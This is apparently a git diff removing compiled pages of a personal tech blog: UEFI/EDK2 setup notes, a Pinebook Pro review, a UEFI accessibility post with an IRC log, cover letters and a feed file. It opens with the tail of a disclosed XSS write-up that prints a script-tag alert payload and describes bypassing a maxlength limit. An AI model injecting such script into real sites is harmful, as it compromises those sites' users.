-Although I’m sure a genius would be able to code golf that, I know I couldn’t.
-
-
Now obviously I can edit any HTML that a server has sent to me.
-If I open up my inspect element window, I can go ahead and change that maxlength attribute to anything I want.
-Let’s change it to 100!
In theory, there is a way that a site can stop people from just putting in their name of any length: server-side validation.
-The server could check to see if the input is too long and reject it if it is.
-The Quiz My Friends server has no such checks in place.
-Therefore, I can send an almost arbitrary load to them.
-Being able to send something potentially very large (more than a few megabytes) is a vulnerability of its own.
-Imagine being able to send entire executable programs as your “name” in one of these quizzes?
-
-
Javascript
-
-
So I went on my merry way thinking about ways to use malicious javascript.
-Then, I thought that might be mean, so I decided to warn users instead.
-I filled in the name with a script tag and a call to alert() to warn the user about this site.
-I edited the max-length attribute to allow me to type a long string like this:
-
-
<script>alert("Don't use this site. It is not secure!");</script>
-
-
-
Sure enough, I got a text from my friend saying: “Tait! I know this is you, why would you do that!”
-A bit salty, but who wouldn’t be.
-
-
Cross-Site Scripting (XSS)
-
-
As my final act, I decided to use a cross-site script that I could edit and have it load with new changes at any time.
This script pops up a warning, telling the user that the site is insecure and it is now redirecting to an article about the attack.
-This script redirects to an older post I made about how XSS works.
-
-
Conclusion
-
-
Watch out for sketchy websites that may be vulnerable to malicious or insecure sites which are ripe for abuse.
-Always check that you are using an encrypted connection, HTTPS.
-And if you see any messages warning you that a site is not secure and redirecting you to some random site…
-Take their info with a grain of salt.
-
-
Happy Hacking, literally :)
-
-
-
-
-
-
-
-
-
-
diff --git a/_site/2021/04/18/uefi-development-environment/index.html b/_site/2021/04/18/uefi-development-environment/index.html
deleted file mode 100644
index cc6d9b6..0000000
--- a/_site/2021/04/18/uefi-development-environment/index.html
+++ /dev/null
@@ -1,183 +0,0 @@
-
-
-
-
- UEFI Development On x86 With EDK2 | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
UEFI Development On x86 With EDK2
-
-
-
-
-
I made this blog so I could remember how to do stuff that had instructions spread around the internet.
-So here is how I setup my environment for developing EFI applications.
-
-
Requirements
-
-
On Artix or other Arch-based distros like Manjaro I installed the following packages: gcc nasm iasl
-
-
Here is what the packages do:
-
-
-
GCC is obviously the GNU Compiler Collection and it allows us to compile C code to machine code.
-
NASM stands for Netwide Assembler. It is an assembler and disassembler for 32 and 64 bit Intel x86 platforms.
-
IASL stands for the ACPI Source Language Compiler/Decompiler. This will compile any ACPI calls to our local machine’s code.
-
-
-
We need all these packages to start our (U)EFI journey.
-Now that these are installed, let’s setup our environment.
-
-
Building EDK2
-
-
I used the stable/202011 branch as that is latest stable version of the EDK2 project.
-
-
So first let’s pull the project:
-
-
git clone https://github.com/tianocore/edk2.git
-
-
Now, let’s fetch the tags and switch to the latest stable version:
-
-
cd edk2
-git fetch
-git checkout stable/202011
-
-
-
Perfect! We’re on stable now! Let’s grab all our submodules: git submodule update --init
-
-
This will take a bit the first time you do it. But no fear, once that’s done, we can finally build the base tools.
-
-
make -C BaseTools
-export EDK_TOOLS_PATH=$HOME/Documents/edk2/BaseTools
-. edksetup.sh BaseTools
-
-
-
Notice we source a file with . before continuing. This is needed to load some tools and options into our shell for later. The environment variable EDK_TOOLS_PATH is set so that EDK knows where to find itself later. Now that everything is loaded up, we can modify a config file located at Conf/target.txt.
-
-
The most important options are these, feel free to append them to the end of the file; there is no default value for them.
-
-
-ACTIVE_PLATFORM = MdeModulePkg/MdeModulePkg.dsc
-TOOL_CHAIN_TAG = GCC5
-# for 64-bit development
-TARGET_ARCH = X64
-# for 32-bit development
-TARGET_ARCH = IA32
-# for 32 and 64-bit development
-TARGET_ARCH = IA32 X64
-
-# set multithreading to 1 + (2 x # of cores)
-MAX_CONCURRENT_THREAD_NUMBER = 9
-
-
-
There are other options, but I don’t know about them much, so I’m just sticking with this for now.
-
-
Finally, after all this work, we can build some .efi files. Let’s compile the Helloworld.efi file!
-Simply run the build command in the terminal.
-You can find your compiled EFI files by running this ls command:
-
-
ls Build/MdeModule/DEBUG_*/*/HelloWorld.efi
-
-
-
This will show all HelloWorld.efi files for all architectures and toolchains (if you decide to change them).
-
-
Running In UEFI Shell
-
-
Once all this is complete, you will want to run your EFI files.
-To do so, let’s first add an EFI shell to use at boot.
-This will appear as an option in your bootloader, like GRUB, which is what I will show documentation for in this article.
-
-
So, first thing is first,
-download and EFI shell file.
-Second, move it to a partition (FAT formatted) which can be used for the UEFI.
-On my Linux system, this is /boot. On others there may be no FAT filesystem so attach a USB and format it as FAT.
-Third, add the EFI Shell option to your grub boot file.
-Substitute hdX with the right hard drive (I did it with trial and error) as when it doesn’t work I would hit ‘e’ on grub and add the ls GRUB command.
-Substitute the gptX with the correct partition, or msdosX if it is a DOS formatted partition table.
-My Shell.efi was placed in /boot/EFI/.
Now regenerate your grub configuration file with grub-update (Debian-based) or grub-mkconfig -o /boot/grub/grub.cfg (Other).
-
-
You’ll know if your shell is working if you see the following text on boot into the EFI shell:
-
-
-UEFI Interactive Shell v2.1
-EDK II
-UEFI v2.4 (EDI II, 0x000100000)
-Mapping table:
- ...
-Shell>
-
-
-
Running Hello World
-
-
When we run our ls command from earlier, remember we saw our HelloWorld.efi file.
-Let’s move this file somewhere useful, like for me, /boot.
-Then, once we’re in our UEFI shell we can run commands:
And that… All that is how you set up a UEFI development environment.
-
-
Conclusion
-
-
This took me a long time to figure out.
-I needed to scrounge resources from around the internet,
-and I had to look at my config files for hours to make sure that I hadn’t missed a step that I did without thinking.
-I hope this will be useful to you and my future self.
I recently got my Pinebook Pro.
-It was more expensive than I was expecting, coming in at (including shipping and handling) C$335.
-I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha!
-Anyway, this is just my first impressions and what I did to fix a few issues.
-
-
Initial Impressions
-
-
My first impressions of this are quite good.
-I like the keyboard; it is firm and not mushy for the price.
-It actually has a similar keyboard to my school-supplied Dell, which I quite enjoyed typing on.
-The shell is aluminium and doesn’t feel too cheap, but I should note that it sure doesn’t feel like a Macbook if that’s what you’re expecting.
-All in all build quality seems pretty good for a product in this price range.
-I’m actually using it right now to write this article, and I’m actually typing faster than I would on my desktop.
-
-
The screen is bright enough and has anti-glare applied to it. I can use it with moderate light behind me, but not a sunset. Decent, and I can’t even use my phone with a sunset right on it, so that’s not a huge loss at all as I think my phone costs more than this haha!
-
-
The trackpad is fine.
-I don’t use the mouse very often, and if I need it I’m more likely to bring an external one.
-It works for what I need though.
-I can’t seem to get the glossy protector off the trackpad though so maybe it would be better if I did haha!
-
-
The temperatures are okay. I would consider them not ideal.
-The left side closer to the hinge can get quite warm when I push it.
-To be expected in some respects, but the metal case certainly makes the heat come out fast and hot!
-It is also passively cooled, so a bit of heat makes sense and is reasonable.
-I wonder if I could mod this to have an active low-profile fan?
-A project for later, I suppose.
-
-
The keyboard is pretty standard for a 14-inch laptop.
-No numpad (except with function key), has F1-12 and media keys using function+F1-12.
-Screen brightness, sound up, down and mute, and num and scroll lock.
-These seem to work no matter what distribution you have (I’ve used Manjaro KDE and Manjaro Sway).
-Perhaps this would react differently on Arch for ARM with no key bindings.
-I’m not sure if this is implemented in software or hardware.
-
-
The speakers and very tin-y and do not sound good at all.
-That said, they look very replaceable, so I’ll look into a mod in the future.
-The Pinebook Pro comes with a headphone port, so you could just use that if the sound bothers you.
-
-
Some suggestions
-
-
I had some issues when it first arrived.
-
-
-
Reboot did not work. The display would glitch out and show horizontal lines. It would only work after a full shutdown.
-
Booting would sometimes not work at all. My SD card would sometimes boot, sometimes not. eMMC would sometimes work and sometimes not. Sometimes I would even get to the login screen, or fully logged in before it decided to freeze/hang. I could “drop to console” (Ctrl+Alt+Fx), but it only made my mouse stop showing, it would not actually display a console. This problem was worse when not plugged in.
-
Performance was not stellar, even for the RK3399.
-
I don’t like the Manjaro logo that displays during boot.
-
-
-
Don’t use KDE
-
-
KDE for me is a bit slow.
-It is not a keyboard-driven desktop.
-To give it some credit though, it does at least have zoom support built in; this is something I wish other desktops would have enabled by default.
-I’m looking at your, Xfce.
-
-
I switched to Manjaro Sway, which is a Wayland-based i3-like tiling window manager.
-I’ve used this on my Raspberry Pi 4, and it is by far my preference among other default distro configurations.
Quickly, we should prepare the eMMC. Open fdisk with your eMMC module and remove all partitions.
-If you have issues with this, check if any partition is mounted, unmount it, then try again.
-fdisk is well documented elsewhere, so I won’t cover it here.
-
-
Once your .xz file is downloaded, unxz the .xz file downloaded.
-
-
-$ cd ~/Downloads
-$ unxz Manjaro-Sway-ARM-pbp-20.10.img.xz
-
Now remove your SD card.
-U-Boot will prefer your SD card over your eMMC, so if you leave it in, it will boot to your SD card.
-
-
Flash Your U-Boot (BSP)
-
-
U-Boot appeared to be the solution to my other two issues.
-I was able to flash a new U-Boot program by using the following commands.
-Be sure to run lsblk beforehand to know which /dev/emmcblk to write to.
-Replace X with the correct number for your system.
The dd instructions are printed out after installing the uboot-pinebookpro-bsp package, so make sure to follow what is printed there if it is different that what I have provided.
-
-
After doing this, not only have I since booted 100% of the time,
-but my display now works correctly after a reboot without a full shutdown.
-
-
Whew! Looking good!!!
-
-
Maybe get some of the accessories
-
-
I didn’t buy any accessories from Pine64.
-I regret this somewhat.
-For one thing, without an accessory to read the eMMC over USB, you need to have a working Linux distro on the SD card to get anywhere with it.
-Flashing directly to the eMMC would have saved me a lot of time.
-
-
The other accessory I could see the occasional use for is the Ethernet adapter.
-When downloading a big update (1GB+), it could be useful to wire in just temporarily.
-Not a huge deal, but worth mentioning.
-
-
I would also be interested in the other batteries they have available.
-Even though it comes with a battery, and I also don’t think you can install a second one, I would be interested to see if I could get more life out of it with an improved battery.
-If this is a standard battery (Pine64 tends to use standard parts), then I would consider getting it from a supplier as well.
-
-
The Pinebook Pro does not come with any HDMI ports.
-It comes with a USB type-C port that can be adapted to HDMI.
-Or you can get a display that supports USB type-C.
-I do not have a display that supports USB type-C, so it might be worth it for me to buy an adapter or find a compatible one more locally.
-Shipping from Hong Kong ain’t cheap.
-
-
Replace the boot logo
-
-
The boot splash screen can be replaced, but I haven’t figured out how yet.
-I will post an update to the blog when I do find out.
-
-
Conclusion
-
-
I really want to use the Pinebook Pro more.
-Pine64 do a lot for the open-source community and they do their best to use only open hardware.
-They do fail in some respects, but they do much better than the mainline distributors like Dell, HP or ASUS.
Good news about the state of accessibility in the BIOS!
-
-
Preamble
-
-
On my ideas page, I have always had up the idea of an accessibility layer for blind people to be able to use their BIOS.
-Although it targets a very small percentage of the population,
-computer programming is often at least a hobby of visually imapired individuals as it is (mostly) a text-based job:
-You write code in plain text, then run it to get either plain text or some kind of HTML output.
-Mostly an accessible career for those who cannot see.
-That said, there has always been an issue with low-level computer infrastructure (i.e. the BIOS/UEFI).
-These menus—which let you edit your boot order, RAM timings, CPU and GPU overclocking and sometimes even fan speed—they were completely inaccessible to those who could not see them.
-Well, until… soon. I had a talk with one of the big bois working on EDK2, the UEFI implementation which is used by most motherboard vendors to create their firmware.
-I thought I would share the info I understand, and the conversation in full.
-
-
News
-
-
Here is what I know:
-
-
-
This year, the GSoC (Google Summer of Code) project had a submission of Ethin Probst to implement VirtIO audio drivers for EDK2.
-
QEMU, the emulator that was chosen to test for this project does not have VirtIO support (yet). I haven’t found info on when this will be done.
-
Because of 2, Ethin and his mentors for his project, Ray Ni and Leif Lindholm decided to first implement USB-dongle audio support first, as this is a) supported in QEMU, and b) is good enough to start squashing bugs at the audio level.
-
Because GSoC is usually over around September, there will likely be some more news coming soon!
-
-
-
The IRC Chat
-
-
Here is the log of the IRC chat for anyone who is interested in anything I might have missed:
-
-
-tait_dot_tech: Hello there, I'm new to IRC so just checking my messages are coming through.
-tait_dot_tech: Looks light it's alright. Ok so I have a question: does anyone know of an active project looking at making UEFI accessible to the blind (i.e. speec) [sic] from within the UEFI environment? Main concern is having blind users be able to boot Linux USBs (I know, very niche thing), but depending on how good it is, could potentially be used to allow blind individuals to change their overclocking,
-tait_dot_tech: hardware RAID, boot order, RAM timings, etc. all on their own. Just wondering if there is any project doing this? I have tried my best to find anything, and am just trying not to duplicate effort. Thanks :)
-leiflindholm: tait_dot_tech: we have a google summer of code project running this year, prototyping a standard for audio output. To hopefully be added to the UEFI specification in the future.
-leiflindholm: once we have a standard for audio output, we can work on adding support for audio output to the Human Interface Infrastructure
-leiflindholm: which is the thing that lets menus be loaded and displayed independent of specific graphical implementation
-tait_dot_tech: Oh wow! Glad to hear there is progress on this! Is there a link to the Google summer of code project, or anything else where I can keep tabs?
-leiflindholm: tait_dot_tech: there isn't much yet, we're only on week 3 of GSoC.
-leiflindholm: https://summerofcode.withgoogle.com/projects/#6499615798460416 is the link if it's something you want to point others to, but any discussion/reporting is likely to hapen [sic] on our mailing lists
-tait_dot_tech: By "our" mailing list, do you mean GSoC, or Edk2?
-leiflindholm: edk2
-leiflindholm: although, on average, at least 99% of edk2-devel will *not* be about audio support
-leiflindholm: When we have anything interesting to say, we'll also post to edk2-discuss/edk2-announce
-tait_dot_tech: Sweet! I'll join that one just in case! I'd be happy to test anything in beta-ish state and report back with any device I can get my hands on. Is that the right list to watch for hepling test it out?
-leiflindholm: I'd say so.
-leiflindholm: The original plan was to start with wirtio [sic] audio support, so anyone could help out anywhere, but that support is not yet upstream in qemu. So for now we're working on an [sic] USB audio class driver. That will certainly be useful to have more people testing with different equipment once we have something working.
-tait_dot_tech: Ahh! So if I want to test, I should get a USB audio dongle. Gotcha! Thank you so much! You've been super helpful!
-leiflindholm: np :)
-
-
-
Things are (slowly) looking up for audio (and eventually screen-reader support) in UEFI!
-Phew! Glad I’m not the only one thinking about this!
-
-
Happy UEFI hacking :)
-
-
-
-
-
-
-
-
-
diff --git a/_site/LICENSE b/_site/LICENSE
deleted file mode 100644
index c9c5eb9..0000000
--- a/_site/LICENSE
+++ /dev/null
@@ -1,29 +0,0 @@
-BSD 3-Clause License
-
-Copyright (c) 2020, Tait Hoyem
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-1. Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
-
-2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-3. Neither the name of the copyright holder nor the names of its
- contributors may be used to endorse or promote products derived from
- this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/_site/README.md b/_site/README.md
deleted file mode 100644
index 111c6c2..0000000
--- a/_site/README.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# tait.tech
-The uncompiled version of my website. Compiled files in _site
-
-### To compile
-
-To compile the files, simply use the bundle Ruby gem.
-
-```
-bundle exec jekyll build
-```
-
-to compile once. If you decide you want to actually have changes appear instantly, use the following
-
-```
-bundle exec jekyll watch
-```
-
-To run a local web server to view the changes on:
-```
-bundle exec jekyll server -w
-```
-
-This will watch for the latest changes, compile them, and make them available on localhost:4000
diff --git a/_site/about/index.html b/_site/about/index.html
deleted file mode 100644
index fbd9637..0000000
--- a/_site/about/index.html
+++ /dev/null
@@ -1,45 +0,0 @@
-
-
-
-
- About | tait.tech
-
-
-
-
-
-
-
-
I recently got my Pinebook Pro.
-It was more expensive than I was expecting, coming in at (including shipping and handling) C$335.
-I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha!
-Anyway, this is just my first impressions and what I did to fix a few issues.
I made this blog so I could remember how to do stuff that had instructions spread around the internet.
-So here is how I setup my environment for developing EFI applications.
Note: I have alerted the administrators of this site multiple times about this vulnerability.
-One email was sent many years ago, which is more than enough time for responsible disclosure.
I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself;
-some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually.
-Lichess is an free and open-source website for chess players;
-it bridges this gap by having two “modes” on the site:
-standard mode and accessibility mode.
I was getting ready to have a public test of some changes I made to lichess.org’s open source chess platform.
-In preperation, I got my Let’s Encrypt certificates and nginx configurations setup…
-and it wouldn’t work.
-Here are some tips for myself and future Lichess developers.
I wanted to get a gift for my blind friend who has been interested in learning Linux for a while now.
-Just when I was about to start looking for something I decided to take a look at Brian Lunduke’s newest video featuring the Raspberry Pi 400.
-The Raspberry Pi 400 has come full circle in terms of computing.
-It is a keyboard. All the computing is done from within the keyboard.
-Much like the Comodore64, this computer comes without a screen but is still technically fully functional without one.
-I had my ‘Aha!’ moment, and decided that the Raspberry Pi 400 would be a very cool present.
I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4.
-I used some standard commands to start to add the pacaur package so I can easily retrieve AUR packages without needing to do it manually.
-Unfortunately, there is a small problem with compiling this on ARM.
Curiosity is fundamental to a deep understanding of any subject.
-Masters, Ph.Ds, and other fancy name suffixes will never help you
-if you don’t have the spirit of curiosity burning inside of you.
When I was creating a little Minesweeper game, I got confused at some points.
-My bomb generation didn’t look quite right, and I for sure didn’t quite get the whole cascading tile reveal thing.
-With a bit of internet research, I found what I was looking for.
-I’ll explain it all in one place for my own research purposes.
A few days ago I had a Django project I wanted to put on a real server.
-This project is still in its infancy, but I thought it would be nice to put it on my resume and show my friends.
-Little did I know the headache coming my way.
-Here are some tips to help you not make the same mistakes as me.
As Linux becomes controlled by corporate sponsors and becomes more full of proprietary blobs, drivers, and even closed-source software like Steam,
-One may wonder if there are other options out there.
-For me, somebody that is intensely interested in security, there is one option: OpenBSD.
As an advocate for openness, I had an idea to make a project out of the government of Canada’s Open Data
-initiative to take a look at how my local MP voted on various pieces of legislation.
-It turns out though that this was not necessary due to how easy it was to find this information on the government’s own website.
-In this article, I will explain how you can do the same.
In a very odd combination of requirements,
-I needed to install MultiCraft on a Gentoo Linux system.
-The PHP USE flags are important so you don’t have to recompile it three times like I did.
So recently I had problem.
-I run a Minecraft server on a big Linux computer I have running in my room.
-Now, as a system administrator it is very helpful to be able to run some simple commands without needing to login with my key, password, TFA, etc.
-It is, frankly, a lot of work.
-Especially when I really just want to be playing games but I just need to check something quickly.
Despite the long name of the article, I have a feeling this may apply to more people than I might think.
-If you have a Node.js application which needs socket.io connections that you want to pass throgh nginx’s reverse_proxy directive then this is the article for you!
I found a cross-site scripting (XSS) attack
-in a well-known quiz hosting website.
-I disclosed the vulnerability to them years ago, so I thought
-now might be a good time to write about it.
If you have ever wanted to garuntee the utmost security of your emails and documents, then this is the guide for you!
-It should be noted that in some circles the tools used are more common than in others.
-These are the everyday tools of many privacy advocates and computer nerds.
There are many kinds of encryption used in our everyday communication. Online and offline, over the internet and in person. In this article, I will explain the basics of how encryption should work in theory. I explain in this article why encryption is important, and why you should care about it.
What is the most embarassing thing you have typed into Google search? What is the most personal secret you told a friend in confidence? What is your bank password? What is your business’s secret to stay ahead of the competition?
Many people have expressed confusion over how padding and margins work in HTML/CSS. I have been one of those people. In this short article I will explain what the differences are between the two, and how it may affect the functionality of your site.
Copying and explaining information in accessible ways is something I have been doing my entire life—sometimes without realizing it.
-As a partially-sighted student,
-I know what information makes sense without visuals and what information will be completely meaningless without additional context or description.
-
-
I also have some background in computer science.
-This allows me to transcribe and explain only what is important.
-Somebody without this background may not know when a number being shown on screen is important or when it is genuinely meaningless.
-I also do not need to go back and forth to the text I am copying from to be one-hundered percent sure I have the right paranthasies, brackets, less-than signs, et cetera.
-All these patterns make sense to me when I read them.
-
-
Although I would prefer to work with computer science students,
-I am willing to be used more broadly if that is of use to you.
-To: Bloombase
-
-128 W Hastings St #350
-Vancouver, British Columbia
-V6B 1G8, Canada
-
-Job Number: 620145
-
-
-
I am a student at the Southern Alberta Institute of Technology (SAIT),
-in Calgary, Alberta
-where I am taking a general IT diploma with a software development major.
-
-
The simple way of explaining my relationship with security is that it is exactly what I want to be doing with my career.
-When given an assignment to chose any technology related topic,
-I chose to talk about Edward Snowden;
-for an emerging trend topic, I delved into public-key encryption and the Curve25519 eliptic crytographic method.
-
-
I run Linux as my primary operating system, and I use an offline password manager. My browser clears cookies every time I restart it.
-These are some basic things I do personally to protect myself.
-
-
I think everybody has things they should be keeping secure,
-and I am very motivated to help them achieve the messure of security needed.
-
-
Security is build right into my goals for my programming career. I have two goals:
-
-
-
Create ease of use for strong crytography, security and privacy tools.
-
Accessibility of software to the visually impaired.
-
-
-
These goals are intertwined in: “If you make something good, make it for everyone.”
-
-
I’ve included my resume for your review, and would like to note that I would be pleased to relocate to Vancouver for this position.
-
-
Thank you for your time in considering me for this position!
-To: Proton Technologies AG
-
-Route de la Galaise 32,
-1228 Plan-les-Ouates
-Geneva, Switzerland
-
-Job Description: Front-End Developer
-
-
-
Why I Want To Work For Proton
-
-
Hello,
-
-
You may notice from the email address that I personally use a Protonmail email address. That in itself may not prove anything.
-That said, security and privacy is what I live for.
-Everybody deserves access to secure communication away from the prying eyes of the NSA, its global partners in spymenship and other governments and special interest groups around the world.
-
-
Proton embodies, to me, what email—and other internet services in general—should be. A service you pay for with your money, not your data.
-
-
What I Plan To Achieve
-
-
My specialty is in improving accessibility with screen readers and other blind-friendly devices.
-The recent addition of key bindings to navigate the interface will go a long way towards accessibility for the visually impaired.
-Awesome work!
-
-
I want to help Protonmail be the best secure, accessible email platform in the world.
-
-
Why I Applied Despite Lack Of Experience
-
-
I have been writing websites since high-school; I went to collage to learn what ‘real’ software development is like. Despite this, I put more time and effort into my off-school hours to learn what people are actually using on a large scale: Django, Ruby On Rails, Redis, Docker, ES6 Javascript. None of which was taught in class.
-Since leaving school I have had the opportunity to use everything I learned out of class in real-world scenarios and I trust that I can take this information to Proton where I can help make the software better for everyone.
-
-
I am a self-starter and a go-getter. Nothing proves it like how much I learned outside of my classes compared to inside.
-
-
-
-
I would be honoured to work for a company I truly believe in.
Arrays are sequential collections of objects of the same type (mostly).
-Arrays and for loops are natural pairs.
-Check out my resources on loops in conjunction with this video.
-
-
Hopefully everything was explained alright.
-Let me know if not.
Functions allow us to modularize our programs into many small parts.
-Of course if we need to do something once at the start of our program, and once again at the end,
-it will be rather inconvenient to copy and paste all our code all the time.
I explain in my own way how loops work using basic C programming techniques to do many things in very few lines.
-Hopefully you don’t get payed by lines of code because that would be ridiculous.
Pointers are often seen as this complicated thing,
-but really they’re just like a home address.
-You can go somewhere to find something specific.
-123 Main St. is where Bob lives,
-and as long as I know Bob lives there we can say “Deliver groceries to 123 Main St.” and we know this means that Bob will get his groceries.
-
-
Hopefully everything is explained well. The resources are as follows:
The most famous incantation among programmers and software engineers since it was popularized in the 1990s by Ken Thompson and Dennis Richie.
-Today I will explain how to make your own “Hello World!” application in C using the Emacspeak environment for the blind and visually impaired.
Structs are a way of grouping related data together.
-Think of a struct the same way your would any other noun.
-They often have many individual attributes that combine to make that thing.
-For example, a student may have a first name, last name, student ID, GPA, list of classes, etc.
-In this tutorial I use a very trimmed down version of what a structure generally contains to make the point without overwhelming you.
-
-
Hopefully it helps. Let me know about any improvements.
-
-
diff --git a/_site/feed.xml b/_site/feed.xml
deleted file mode 100644
index 129fbd5..0000000
--- a/_site/feed.xml
+++ /dev/null
@@ -1,920 +0,0 @@
-Jekyll2021-06-22T16:16:44-06:00http://localhost:4000/feed.xmlUEFI Audio Protocol & UEFI BIOS Accessibility2021-06-21T00:00:00-06:002021-06-21T00:00:00-06:00http://localhost:4000/2021/06/21/uefi-audio<p>Good news about the state of accessibility in the BIOS!</p>
-
-<h2 id="preamble">Preamble</h2>
-
-<p>On my <a href="/ideas/">ideas page</a>, I have always had up the idea of an accessibility layer for blind people to be able to use their BIOS.
-Although it targets a very small percentage of the population,
-computer programming is often at least a hobby of visually imapired individuals as it is (mostly) a text-based job:
-You write code in plain text, then run it to get either plain text or some kind of HTML output.
-Mostly an accessible career for those who cannot see.
-That said, there has always been an issue with low-level computer infrastructure (i.e. the BIOS/UEFI).
-These menus—which let you edit your boot order, RAM timings, CPU and GPU overclocking and sometimes even fan speed—they were completely inaccessible to those who could not see them.
-Well, until… soon. I had a talk with one of the big bois working on EDK2, the UEFI implementation which is used by most motherboard vendors to create their firmware.
-I thought I would share the info I understand, and the conversation in full.</p>
-
-<h2 id="news">News</h2>
-
-<p>Here is what I know:</p>
-
-<ol>
- <li>This year, the GSoC (Google Summer of Code) project had <a href="https://summerofcode.withgoogle.com/projects/#6499615798460416">a submission of Ethin Probst</a> to implement VirtIO audio drivers for EDK2.</li>
- <li><a href="https://qemu.org">QEMU</a>, the emulator that was chosen to test for this project does not have VirtIO support (yet). I haven’t found info on when this will be done.</li>
- <li>Because of 2, Ethin and his mentors for his project, Ray Ni and Leif Lindholm decided to first implement USB-dongle audio support first, as this is a) supported in QEMU, and b) is good enough to start squashing bugs at the audio level.</li>
- <li>Because GSoC is usually over around September, there will likely be some more news coming soon!</li>
-</ol>
-
-<h2 id="the-irc-chat">The IRC Chat</h2>
-
-<p>Here is the log of the IRC chat for anyone who is interested in anything I might have missed:</p>
-
-<pre class="terminal">
-tait_dot_tech: Hello there, I'm new to IRC so just checking my messages are coming through.
-tait_dot_tech: Looks light it's alright. Ok so I have a question: does anyone know of an active project looking at making UEFI accessible to the blind (i.e. speec) [sic] from within the UEFI environment? Main concern is having blind users be able to boot Linux USBs (I know, very niche thing), but depending on how good it is, could potentially be used to allow blind individuals to change their overclocking,
-tait_dot_tech: hardware RAID, boot order, RAM timings, etc. all on their own. Just wondering if there is any project doing this? I have tried my best to find anything, and am just trying not to duplicate effort. Thanks :)
-leiflindholm: tait_dot_tech: we have a google summer of code project running this year, prototyping a standard for audio output. To hopefully be added to the UEFI specification in the future.
-leiflindholm: once we have a standard for audio output, we can work on adding support for audio output to the Human Interface Infrastructure
-leiflindholm: which is the thing that lets menus be loaded and displayed independent of specific graphical implementation
-tait_dot_tech: Oh wow! Glad to hear there is progress on this! Is there a link to the Google summer of code project, or anything else where I can keep tabs?
-leiflindholm: tait_dot_tech: there isn't much yet, we're only on week 3 of GSoC.
-leiflindholm: https://summerofcode.withgoogle.com/projects/#6499615798460416 is the link if it's something you want to point others to, but any discussion/reporting is likely to hapen [sic] on our mailing lists
-tait_dot_tech: By "our" mailing list, do you mean GSoC, or Edk2?
-leiflindholm: edk2
-leiflindholm: although, on average, at least 99% of edk2-devel will *not* be about audio support
-leiflindholm: When we have anything interesting to say, we'll also post to edk2-discuss/edk2-announce
-tait_dot_tech: Sweet! I'll join that one just in case! I'd be happy to test anything in beta-ish state and report back with any device I can get my hands on. Is that the right list to watch for hepling test it out?
-leiflindholm: I'd say so.
-leiflindholm: The original plan was to start with wirtio [sic] audio support, so anyone could help out anywhere, but that support is not yet upstream in qemu. So for now we're working on an [sic] USB audio class driver. That will certainly be useful to have more people testing with different equipment once we have something working.
-tait_dot_tech: Ahh! So if I want to test, I should get a USB audio dongle. Gotcha! Thank you so much! You've been super helpful!
-leiflindholm: np :)
-</pre>
-
-<p>Things are (slowly) looking up for audio (and eventually screen-reader support) in UEFI!
-Phew! Glad I’m not the only one thinking about this!</p>
-
-<p>Happy UEFI hacking :)</p>Good news about the state of accessibility in the BIOS!Pinebook Pro, The Ultimate ARM Laptop2021-06-02T00:00:00-06:002021-06-02T00:00:00-06:00http://localhost:4000/2021/06/02/pinebook-pro<p>I recently got my Pinebook Pro.
-It was more expensive than I was expecting, coming in at (including shipping and handling) C$335.
-I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha!
-Anyway, this is just my first impressions and what I did to fix a few issues.</p>
-
-<h2 id="initial-impressions">Initial Impressions</h2>
-
-<p>My first impressions of this are quite good.
-I like the keyboard; it is firm and not mushy for the price.
-It actually has a similar keyboard to my school-supplied Dell, which I quite enjoyed typing on.
-The shell is aluminium and doesn’t feel <em>too</em> cheap, but I should note that it sure doesn’t feel like a Macbook if that’s what you’re expecting.
-All in all build quality seems pretty good for a product in this price range.
-I’m actually using it right now to write this article, and I’m actually typing faster than I would on my desktop.</p>
-
-<p>The screen is bright enough and has anti-glare applied to it. I can use it with moderate light behind me, but not a sunset. Decent, and I can’t even use my phone with a sunset right on it, so that’s not a huge loss at all as I think my phone costs more than this haha!</p>
-
-<p>The trackpad is fine.
-I don’t use the mouse very often, and if I need it I’m more likely to bring an external one.
-It works for what I need though.
-I can’t seem to get the glossy protector off the trackpad though so maybe it would be better if I did haha!</p>
-
-<p>The temperatures are okay. I would consider them not ideal.
-The left side closer to the hinge can get quite warm when I push it.
-To be expected in some respects, but the metal case certainly makes the heat come out fast and hot!
-It is also passively cooled, so a bit of heat makes sense and is reasonable.
-I wonder if I could mod this to have an active low-profile fan?
-A project for later, I suppose.</p>
-
-<p>The keyboard is pretty standard for a 14-inch laptop.
-No numpad (except with function key), has F1-12 and media keys using function+F1-12.
-Screen brightness, sound up, down and mute, and num and scroll lock.
-These seem to work no matter what distribution you have (I’ve used Manjaro KDE and Manjaro Sway).
-Perhaps this would react differently on Arch for ARM with no key bindings.
